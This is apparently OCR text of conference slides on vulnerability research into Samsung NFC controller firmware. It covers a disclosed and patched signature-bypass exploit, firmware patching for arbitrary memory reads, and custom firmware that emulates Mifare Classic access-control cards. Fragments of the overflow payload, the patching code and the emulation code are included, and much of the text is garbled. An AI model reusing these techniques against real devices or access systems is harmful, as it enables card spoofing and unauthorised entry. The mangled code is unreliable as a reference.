tmpfs on /mnt type tmpfs (rw,seclabel,nosuid,nodev,noexec,relatime,mode-755,g1d-1000) 
/dev/block/sda20 on /odm type ext4 (ro,seclabel,relatime,block validity,discard,delalloc,barrier,user xattr,acl,1 version) 
/dev/block/sdal8 on /system type ext4 (ro,seclabel,relatime,block validity,discard,delalloc,barrier,user xattr,acl,1 version) 
/dev/block/sdal9 on /vendor type ext4 (ro,seclabel,relatime,block validity,discard,delalloc,barrier,user xattr,acl,1 version) 
none on /acct type cgroup (rw,nosuid,nodev,noexec,relatime,cpuacct) 
none on /dev/memcg type cgroup (rw,nosuid, nodev,noexec,relatime,memory) 


Further Research — S3NRN82 


S3NRN82 was selected as the next target — latest available chipset 
Multiple chip firmware revisions available 
Found in Samsung Galaxy S9 


S9 was purchased, and rooted using OEM unlocking and a Custom 
ROM 


S3NRN82 - Firmware File 


Same format as SSFWRN5 


Initial Stack Pointer larger - more RAM 


00000000 
00000010 
00000020 
00000030 
00000040 
00000050 
00000060 
00000070 
00000080 
00000090 
000000a0 
000000b0 
000000c0 
000000d0 
000000e0 
000000f0 
00000100 
00000110 
,00000120 
- 00000130 
00000140 
00000150 
00000160 
00000170 
00000180 
00000190 
000001a0 
000001b0 
000001c0 
000001d0 
000001e0 
000001f0 
00000200 
00000210 
00000220 
00000230 
00000240 
00000250 
00000260 
00000270 
00000280 
00000290 
000002a0 
000002b0 
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Further Research — Replicating Vulnerability 


Commands 3 and 6 were removed 

A new command, 7, was identified to reboot the chip 

New bootloader size implied that it had been modified 

Lack of memory readout would force any exploitation to be blind 


Signatures checks utilising SHA-1 were found to fail 


Further Research — Replicating Vulnerability 


I2C communication was no longer provided by Logcat [28219.261206] irq 
(28219. 2612720] 1rq-gpio state is low! 
(28219. 262391] NFC mode is : O 
(28219. 309909] NFC mode 1s : 2 


G H H H [28219.320423] write(4) 
A /proc/nfclog file was found which contained the sizes of esta cones ace 
commands in sequence [ARATA EHI] rideo 


[28219.341952] read(14) 
[28219.353233] write(8) 
[28219.353851] irq 
[25215. 374432] read(4) 


From this, the change from SHA-1 to SHA-256 could be 
deduced 


(28219. 417814] write(132) 
[28219.421540] irq 
[28219.442569] read(4) 
[28219.453325] write(260) 
[28219.460095] irq 
[28219.480493] read(4) 
[28219.491359] write(260) 


This was verified by modifying the firmware update tool 


Further Research — Replicating Vulnerability 


Nature of device crashes allowed for analysis of stack size 


The entire stack could be overwritten with pointers into code memory 


uint8 t smash2[] = (0x02, 0x00, @x8c, @x@@, 
@xFA, @xCE, OxFA, @xCE, OxFA, OxCE, OxFA, 
OxFA, OxCE, OxFA, OxCE, OxFA, OxCE, OxFA, 
@xFA, @xCE, OxFA, @xCE, OxFA, OxCE, OxFA, 
@xFA, @xCE, @xFA, OxCE, OxFA, OxCE, OxFA, 
OxFA, OxCE, OxFA, OxCE, OxFA, OxCE, OxFA, 
@xFA, @xCE, @xFA, @xCE, OxFA, OxCE, OxFA, 
@xFA, @xCE, @xFA, @xCE, OxFA, @xCE, OxFA, 
@xFA, @xCE, @xFA, @xCE, OxFA, OxCE, OxFA, 
@xFA, @xCE, @xFA, @xCE, OxFA, OxCE, OxFA, 

33 

for(int i = 4 ; i < sizeof(smash2) ; i+=4) ( 


memcpy (&smash2[i],&lrValue,4); 


wRet = writeData(f,smash2,sizeof(smash2)); 
receiveData(ndat); 


GxCE, 
exCE, 
exCE, 
exCE, 
exCE, 
GxCE, 
exCE, 
exCE, 
GxCE, 


OxFA, 
@xFA, 
exFA, 
exFA, 
OxFA, 
OxFA, 
OxFA, 
OxFA, 
OxFA, 


GxCE, 
exCE, 
@xcE, 
@xcE, 
@xcE, 
GxCE, 
GxCE, 
exCE, 
GxCE, 


OxFA, 
@xFA, 
@xFA, 
exFA, 
@xFA, 
@xFA, 
@xFA, 
@xFA, 
@xFA, 


GxCE, 
GxCE, 
GxCE, 
GxCE, 
GxCE, 
GxCE, 
GxCE, 
GxCE, 
GxCE, 


@xFA, @xCE, OxFA, 
@xFA, @xCE, OxFA, 
@xFA, @xCE, OxFA, 
@xFA, @xCE, OxFA, 
@xFA, @xCE, OxFA, 
@xFA, @xCE, OxFA, 
@xFA, @xCE, OxFA, 
@xFA, @xCE, OxFA, 


@xcE, 
@xcE, 
@xcE, 
@xcE, 
@xcE, 
@xcE, 
@xcE, 
@xcE, 


Further Research — Exploiting Vulnerability 


Stack was filled an initial value (0x0001) via buffer overflow 

NCI initialisation commands were sent to chip 

If an NCI response was received, the exploit worked 

If NCI response failed, the device was reset and the initial value incremented 


Signature bypass succeeded at address 0x0165 


Demo 


starlte:/data/local/s3nrn82 bypass example # ./runfj 


Further Research - Disclosure 


Vulnerability was disclosed to Samsung 


The vulnerability was patched on newly manufactured chipsets from April 2020 


All future chipsets will not be vulnerable 


Custom Firmware would still be viable for older devices 


Patching Existing Firmware 


Custom firmware could be written for any of these chips 
An initial goal was to dump the S3NRN82 bootloader 
The only method for accessing data would be via I2C 


This would also facilitate debugging 


Patching Existing Firmware 


Unreferenced/blank memory in firmware can be used to store new code 
Compiled machine code can be patched in 


The oldest available firmware was found, and used as a base — found in a Galaxy S8 ROM 


f 

f 

fij s 
f|s 
fjs 
f|s 
f|s 
fjs 
fjs 
fjs 
f|s 
f|s 
fjs 
f|s 
f|s 
fis 
fjs 
fj s 
fjs 
f|s 
f|s 
f|s 
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Patching Existing Firmware 


C functions can be compiled as a raw binary 
using "gcc —c” 


Stack handling is performed as with normal 
compilation 


Function relocation is not performed 


No standard C libraries can be included 


void getArbitraryMemory() { 


char* ptr = 0x20000E32; 
char* cmdPtr = 0x20000b84; 


ptr[@] = 8x28; 


unsigned int memoryReadPointer = 
cmdPtr[3] | 
(cmdPtr[4]««8) | 
(cmdPtr[5]««16) | 
(cmdPtr [6]««24) ; 


unsigned char* readPtr = memoryReadPointer; 
for(int i = 0 ; i « 0x20 ; i++) 1 
ptr[i-1] = readPtr[i]; 


Patching Existing Firmware 


00000000 «getArbitraryMemory»: 


Bd: 2220 movs r2, #32 
. 2: 4b0d ldr r3. [pcs 452] ; (38 <getArbitraryMemory+0x38=>) 
In C, function calls are generated as Branch 2 yer strb — r2, [a, dj E AM 
c c 6: 4b0d ldr r3, [pc, #52] ; (3c <getArbitraryMemory+0x3c>) 
and Link Instructions 8: 4a0d ldr r2, [pc, #52] ; (40 <getArbitraryMemory+0x40>) 
a 781b ldrb r3, [r3, $0] 
c: 7812 ldrb r2, [r2, $0] 
e: 021b Isls r3, r3, #8 
19; 0412 lsls rZ, r2, FLG 
p ; 12: 4313 orrs r3, r2 
These can be directly patched in order to 14: 4a0b ldr —— r2, [pc, #44]  ; (44 <getArbitraryMemory+0x44>) 
' , , ' 16: 7812 ldrb r2, [r2, #0] 
18: 4313 orrs r3. re 
implement different functionality la: 4a0b ldr r2, [pc, #44] ; (48 <getArbitraryMemory+0x48>) 
lc: 7812 ldrb r2, [r2, $0] 
le: 0612 lsls r2, r2, #24 
20: 4313 orrs F3. he 
22: 0018 movs ro,- r3 
H e H 24: 4909 ldr FE; c, #36 ; (4c <getArbitraryMemory+0x4c>) 
This can completely override intended aay ees adds i M direi 
° . 28: lac9 subs r1; ri r3 
functionality 2a: 781a ldrb r2, [r3, #0] 
2c: 54ca strb r2, [ri, r3] 
2e: 3301 adds r3, 41 
30: 4283 cmp r3. rB 
32: dlfa bne.n 2a <getArbitraryMemory+0x2a> 
34: 4770 bx lr 


36: 46c0 nop ; (mov r8, r8) 


Patching Existing Firmware 


Branch And Link uses two's complement 
relative addresses 


Using the function address and current 
address can allow for creation of new BL 
functions 


This can be directly patched over original 
BL functions 


uint32 t generateBlFunction(uint32 t currAddress, uint32 t destinationAddress) ( 


uint32 t offset - destinationAddress-currAddress-4; 


if(destinationAddress < currAddress) { 
uint32 t mask - 0b11111111111111111111111; 


offset = ((destinationAddress-currAddress-4) & mask) + ((destinationAddress-currAddress-4) & ~mask); 


} 


uint8_t blFunction[4]; 
memset(blFunction,0,4); 


blFunction[1] = 9xf8; 

uint32 t val = (offset & 0b11111111111000000000000) »»12 ; 
blFunction[9] = val&Oxf*; 

blFunction[1] |= val>>8; 


blFunction[3] = 9xf9; 

blFunction[3] |» 9x98; 

blFunction[2] = (offset & 0b111111111111)»»1; 
blFunction[3] |= (offset>>9); 


uint32_t retVal; 

memcpy (&retVal,blFunction,4); 
printf("Relocated: %@8x\n",retVal) ; 
return retVal; 


Patching Existing Firmware 


A build application for linking and relocation was developed, which directly patched firmware 


int main() { 


printf("Starting firmware build\n"); 


all: 
aarch64-linux-gnu-gcc-8 -static updater.c -o update 
aarch64-linux-gnu-gcc-8 -statid run firmware.c -o run 
arm-none-eabi-gcc -02 -mthumb -c functions.c s s 
arm-none-eabi-objdump -d functions.o tnt size = 8; : 

int f = open("sec s3fwrn5 firmware modded note4.bin",O RDONLY); 

int readSize = read(f,&fwData[0x0000] ,0x20000-0x3000) ; 


arm-none-eabi-objcopy --onLy-section-.text --image-base-0x2000 --section-alignment=@x20@@ -O binary functions.o functions.bin printf("Original firmware size: X68xWn",readSize); 
readelf -r functions.o | grep THM |sed 's/ */ /g' | cut -d' ' -£5,1,4 | tee relocations.txt close(f); 

readelf -s functions.o | grep FUNC | sed 's/ */ /g' | cut -d' ' -f 3,9 | tee function pointers.txt 

Ecc -o generate firmware main.c 

-/generate firmware int ff = open("functions.bin",O0 RDONLY); 


readSize = read(ff,&fwData[CUSTOM FUNCTIONS OFFSET],9x49000) ; 
printf("Additional firmware size: Xd X08x (%d)\n",ff,readSize,readSize); 
[35111623 H 


performRelocations(); 


generateSymbolPointers(); 


Patching Existing firmware 


The vendor-specific NCI command “2F 24” 


likely arbitrary read function call ; CODE XREF: ROM:000117E2lp 
was selected for modification = — 
PUSH [R3-R5,LR] ; egisters 
MOVS RA, #0 ; Rd = Op2 
MOV R1, SP ; Rd = 
, STRB R4, [R1, #0x10+var 10) ; 
Its response was found by searching for vov x d nih 
u * 7 | aM 
MOVS.*#0x24 | ae ae meee 
: MOVS RA, #3 ; Rd = Op2 
loc 10AAC i CODE XREF: aey Salemi read 
MOVS R1, #@x2 $' ; Rd 
sub 11476 was overridden to the new "i REEL, GEN — 
= " MOV RO, R4 ; Rd = Op2 
“getArbitraryMemory” function BL sub 11466 ; Branch with Link | 
CMP RA, #0 ; Set cond. codes on Opi - Op2 
BNE loc 10AC8 ; Branch 
MOV RO, SP ; Rd = Op2 
LDRB R1, [Re, #0x16+var 10] ; 
MOV RO, RS ; Rd 
Writing of new firmware took ^20 seconds ame ee » AARE a E Meee A 


loc_10AC8 ; CODE XREF: likely arbitrary read 
BL sub 119BE ; Branch with Link 


POP (R3-R5,PC) ; Pop registers 
End of function likely arbitrary read function call 


The new function could be expanded as 
needed 


Patching Existing firmware 


To receive parameters, location of command in RAM must be found 
A crafted NCI request was generated: 2F 24 04 FA CE FA CE 
The parameters were searched through RAM, and address set in response payload 


This could allow for parameters to be used in readout 


for(int i = 0x20000000 ; i « 0x20002000 ; i++) ( 


uint8 t* ptr = i; 
if(ptr[@] == Oxfa && ptr[1] == Oxce && ptr[2] == Oxfa && ptr[3] == Oxce) (1 


re[e] 
re[1] 
re[2] 
re[3] 
break; 


i&O0xff; 
(i»»8)&0xff; 

(i»»16)80xff; 
(i»»24)80xff; 


S3NRN82 Bootloader 


ROM: 00000152 


ROM:00000152 sub 152 3 CODE XREF: sub 2F4«481j 
1 M: ; : su +640 ... 
The patched firmware allowed for RO: 60999152 " a 
dumping of arbitrary memory RON: 00000158 Lb B 


ROM: 00000015A 
ROM: 00000015C 
ROM: @@@@@15E 


With this, the new bootloader was 
d own | Oa d ed ROM: 00000168 


ROM: 0000016A 
ROM: 00000016C 
ROM:@@@@@16C loc 16C 3 CODE 
ROM: @806616C DR -(sub 3304 
ROM: @@@6@16E 

° ° ROM:0000016E loc 16E 3 CODE XREF: sub 1524241j 

This allowed for analysis of how the RoM:0000016E BD prae 

ROM: 60000170 


initial exploit worked at 0x0165 Ei 


ROM: 00000172 


XREF: sub 1524Efj 


1 


: sub 1524181j 
ROM: 


ROM: 


Exploit was modified to point to 0x0173 p eee ion sub i5 


Custom Firmware — Tag Emulation 


The hardware of the chip supports multiple protocols: 
IS014443a, ISO14443b and more 


Access to hardware registers allow for arbitrary 
communication 


A goal was to emulate a Mifare Classic tag in its entirety on 
the S9 


A Proxmark was used for debugging 


Custom Firmware — Tag Emulation 


NCI commands to initialise device were dumped from phone 
and replayed 


Unnecessary commands were removed 


The NCI RF Discover command was modified to only act as 
IS014443a tag 


[8x21, 8x88, OxG87, axe2, axed, & 


{@x21, @x@1, Gx1b, exem, exes, © 


[ax28, 8x82, Ox10, axes, Gx38, & 
Bxa9, 
8X31, 8X81, 8x80, 8x32, ƏXƏL, 
8x28, 
8x38, 8X81, 8x80, GOx50, axe, 


Ts 


{ex21, axez, exei, 
axel, 


8x88, axel, 


Custom Firmware — Tag Emulation 


Initial reversing requires knowledge of functions and hardware in depth 


Lack of any strings means that this would require inferring the purpose of functions 
manually 


To begin, the ISO14443A SELECT command (0x93) was searched for in IDA: “CMP.*#0x93” 


The first result provided immediate 


information: 


Custom Firmware — Tag Emulation 


Placing the phone on a reader allowed this to be verified 


It was possible to use the patched I2C function to dump 
the entire hardware configuration 


This corroborated the results from IDA 
Reader commands could be read 


Access to these registers would also allow for passive 
sniffing 


00000000 
00000010 
00000020 
00000030 
00000040 
00000050 
00000060 
00000070 
00000080 


00000120 
00000130 
00000140 


00000210 
00000220 
00000230 
00000240 
00000250 
00000260 
00000270 
00000280 
00000290 
000002a0 
000002b0 
000002c0 
000002d0 
000002e0 
000002f0 
00000300 


00000400 


00000800 


00 
00 
00 
81 
88 
00 
00 
00 
00 


11 
Od 
00 


01 
fb 
30 
22 
01 
77 
c3 
42 
46 
f4 
38 
bo 
a6 
3d 
01 
00 


26 


86 


00 
00 
00 
00 
00 
00 
00 
00 
00 


Oc 
a0 
00 


00000200 52/a8 


e9 


43 


Custom Firmware — Tag Emulation - Enumeration 


I$5014443a enumeration occurs using the following information: 
ATQA - defined by NCI 
SAK — defined by NCI 
UID — randomised on phones, first byte always 0x08 
These define tag type and unique identifier 


Via NCI, ATQA and SAK values are restricted to specific values 


Due to their purpose, these values were stored in individual hardware registers 


Custom Firmware — Tag Emulation - Enumeration 


enumeration setup function ; CODE X 
LDRB R2, [R@,#@x16 


Via NCI, SAK and ATQA values were sent to the cu 


e ORRS 
chip LOR 
REV16 
SUBS 
STR 
LDR 
LDR 
SUBS 


Using the patched I2C command, a RAM dump = 


STR 


was taken 2 


MOVS 
SUBS 
STR 
STR 
STR 


The SAK and ATQA values were identified in RAM, = 
and compared with IDA BEQ 


LDR R2, [R0,#0x10] 
R2, R2, #3 


STR R2, [R1, - 


LDR R2, [RO,#0 


This lead to a single function referencing pum 
hardware registers : 2, i EEEE PPE E 


R3, [RO,#0 
R2, R3 


R2, y 


loc | BD94 


Custom Firmware — Tag Emulation - Enumeration 


This function was overridden, then called within the new function 
Custom SAK, ATQA and UID values were added via hardware to replace initial values 


Confirmation of this patch was performed using a Proxmark as a reader 


uint32 t potentialMemorySetup(uint32 t r9) { 
uint32 t (*setupFunction)(uint32 t) = (uint32 t (*)(uint32 t))0xBD47; 
uint32 t val = setupFunction(r9); 
uint32 t* uidPtr - 0x40020034; 
uint32 t* atqaPtr = 0x4002003c; 
uint32 t* sakPtr - 0x40020040; 


struct TagState* tagState - TAG STATE OFFSET; 


memcpy(&uidPtr[9],&tagState-»tagHeader[9?],53); 
atqaPtr[@] = 0x4400000900; 
sakPtr[@] = 0x00040988; 


return val; 


[I~ 


Custom Firmware — Tag Emulation - Enumeration 


Analysis via the Proxmark demonstrated that this was successful 


This would allow for modification of enumeration information, but not full 
communication 


Architecture Identifier: AT91SAM7Sxx Series 
Nonvolatile Program Memory Type: Embedded Flash Memory 
proxmark3> hf 14a reader 
isol4443a card select failed 
proxmark3» hf 14a reader 
UID : 67 c6 f4 a7 20 14 a7 
ATQA : 00 44 
SAK : 09 [2] 
Field dropped. 
proxmark3» hf 14a reader 
UID : 67 c6 f4 a7 20 14 a7 
ATQA : 00 44 
SAK : 09 [2] 
Field dropped. 
proxmark3» hf 14a reader 
UID : 67 c6 f4 a7 20 14 a7 
ATQA : 00 44 
SAK : 09 [2] 
Field dropped. 


Custom Firmware — Tag Emulation — Full Communication 


Chip was known to respond to commands 0x50 
(HALT) and OxEO (RATS) 


RATS was searched via: “CMP.*#0xe0” 


Four results were found, and analysed 
individually 


This lead to finding the state machine 
functions 


Additional valid commands were noted 


Custom Firmware — Tag Emulation — Full Communication 


Further tracing from RATS found the function which sent responses See dui. 
mem32[0x40020008/4] = ((1en*8)); 


mem32[0x40020004/4] &- -0x4000; 


This was found to set a buffer, size, and some configuration 
information 


nfcBuff[i] = data[i]; 


The written registers were copied and added to a new function 


mem32[0x40020010/4] - 0x80003; 


Custom Firmware — Tag Emulation — Full Communication 


A basic read command was first implemented : 30 XX + CRC 
This was configured to return unencrypted memory blocks 


This could later be extended to include appropriate encryption 


proxmark3> hf 14a raw -sc 30 00 

Card selected. UID[/]: 

67 C6 FA A7 20 14 A7 

received 18 bytes: 

67 Co F4 A7 20 14 A7 89 44 00 C2 00 00 600 OO QOO 80 50 


Custom Firmware — Tag Emulation — Full Communication 


The state machine function was overridden 


A switch statement was used to respond to Mifare 
commands 


Analysis showed that the HALT command affected 
the internal state machine 


This function was called from the new state 
machine 


Non-standard debugging commands were also 
added 


break; 

H 

case CMD READBLOCK: { 
sendBlock(tagState,cmd[1]); 
break; 


H 

case CMD WRITEBLOCK : 
tagState-»blockToWrite - cmd[1]; 
tagState-»setupState = State AwaitingWriteBlock; 


sendAck(tagState); 
break; 

case CMD HALT: 1 
tagState->cryptoAuthState = 0; 
void (*updateHalt))(uint32 t) = (void (*)(uint32 t))exsre9 
updateHalt|(@) 5 
break; 


Custom Firmware — Tag Emulation — Full Communication 


With full control, any ISO14443a tag could be emulated 


Mifare Classic's Crypto-1 authentication and access mechanisms were implemented 


While this worked with a Proxmark, it would not work on a legitimate reader 


} else if(tagState->setupState == State AwaitingAuth) { 
int i = ð; 


for(i =@3;1< 4; i+) { 
cryptoGetByte(tagState-»cryptoState,cmd[i],1); 


for(i = @ ; i< 4 ; ic) 
cryptoGetByte(tagState->cryptoState,2,0); 


tagState-»respData[90] = 0x3c ^ cryptoGetByte(tagState-»cryptoState,0,9); 
tagState-»respData[1] = @x2b ^ cryptoGetByte(tagState-»cryptoState,0,9); 
tagState->respData[2] = 0xcd ^ cryptoGetByte(tagState-»cryptoState,0,9); 
tagState-»respData[3] = 0xad ^ cryptoGetByte(tagState-»cryptoState,9,0); 


sendNfcResponse(tagState-»respData,4); 


tagState->setupState = State Selected; 
tagState-»cryptoAuthState - CryptoState KeyA; 


proxmark3> hf mf rdbl 0 A ae/fd807/5f3a 

--block no:0, key type:A, key:ae 7f d8 07 5f 3a 

#db# READ BLOCK FINISHED 

is0k:01 data:67 c6 f4 a7 20 14 a7 89 44 00 c2 00 00 00 00 00 
proxmark3» J 


Custom Firmware — Tag Emulation — Restrictions 


Mifare Classic encrypted communication overrides the parity bit of each communicated byte 
The chip hardware was configured to auto-generate this parity bit 
It was possible that a hardware register setting may allow for modifying parity bits 


Each register was modified in turn, while responses were checked on a Proxmark 


75716 | 80452 | Tag | 01 02 03 04 | | 
89984 | 99360 | Rdr | 60 a7 bc be! a4! 47! 01! ce | !crc| AUTH-A(167) 
111380 | 116116 | Tag | 8f 34 10 ab | | 


Custom Firmware — Tag Emulation — Restrictions 


The parity register was found at address Sune NUEVE MEE 
0x40020004, by setting bit Ox4000 viness.t byte = 0 


uinti6 t bit = @; 


for(int i=@ ; i< 18 ; i++) f{ 


uint8_t unEncVal = tagState->respData[i]; 


Wit h th is set, pa rity CO u id be m O d ifi e d tagState-»respData[i] = tagState-»respData[i] ^ cryptoGetByte(tagState-»cryptoState,0,0); 


for(int j-09;j«8; je) { 


if( (tagState-»respData[i]&(1««j)) !2 9 ) 1 
tagState-»parityRespData[byte] "m (i««bit); 


This required adding additional bits to the buffer, pr 


if(bit>7) t 


and increasing the length set by one bit per byte Mt d 


With this in place, a Mifare Classic tag could be fully 1) crypto parity bit, FINGERS CROSSED. 
emu lated tagState->parityRespData[byte] |= (parityBit<<bit); 


bit++; 
if(bit>7) { 
byte++; 
bit = @; 
H 
Y 


[sendNfcBitResponsel(tagState-»parityRespData, 18); 


^ checkParity(unEncVal)) & 1; 


Custom Firmware — Tag Emulation — Dumping Writes 


Writes to tags were hooked to send I2C messages 


This allowed for persistent modification of tags 


} else if(tagstate-»setupState == State AwaitingWriteBlock) { 


tagstate-»setupSstate = State Selected; 
tmemcpy (&tagState-»tagHeader[tagState-»blockToWrite*16],&cmd[9?],16); 


sendAck(tagsState); 


void (*setupResponseHeader)(uint32 t,uint32 t) = (void (*)(uint32 t,uint32 t))exiesss; 
setupResponseHeader(8xef ,8x99); 

unsigned char* i2cBlock = 0x20000024;; 

i2cBlock[2] = exii; 

i2cBlock[3] = tagState-»blockTowrite; 

tmemcpy (&i2cBlock[4],&cmd[@],16); 

void (*sendCraftedNfcResponse)(void) = (void (*)(void))exii9BF; 
sendCraftedNfcResponse(); 


} else if(tagState-»setupstate == State AwaitingAuth) { 


Demo 


Custom Firmware — Final Notes 


Tag emulation allows for spoofing of 13.56MHz access control cards, as well as more 
esoteric uses 


All other NFC functionality works as normal, despite patching 


More subtle than a dedicated attack tool 


Expansion of this functionality could allow for offline cracking attacks 


The same emulation could be performed on any supported protocol 


Now framework is in place, easy to develop for 


Conclusion 


All outlined vulnerabilities were patched by Samsung as of April 2020 


The vulnerability required root access, but fully compromised the chip 


Phones are exploitable embedded devices, and should be treated as such 


Bootloader vulnerabilities are more common than you think, especially in phones 


Developing custom firmware for proprietary chips is challenging, but rewarding 


If an undisclosed vulnerability is found in an old chip, it'll likely be in the new one 


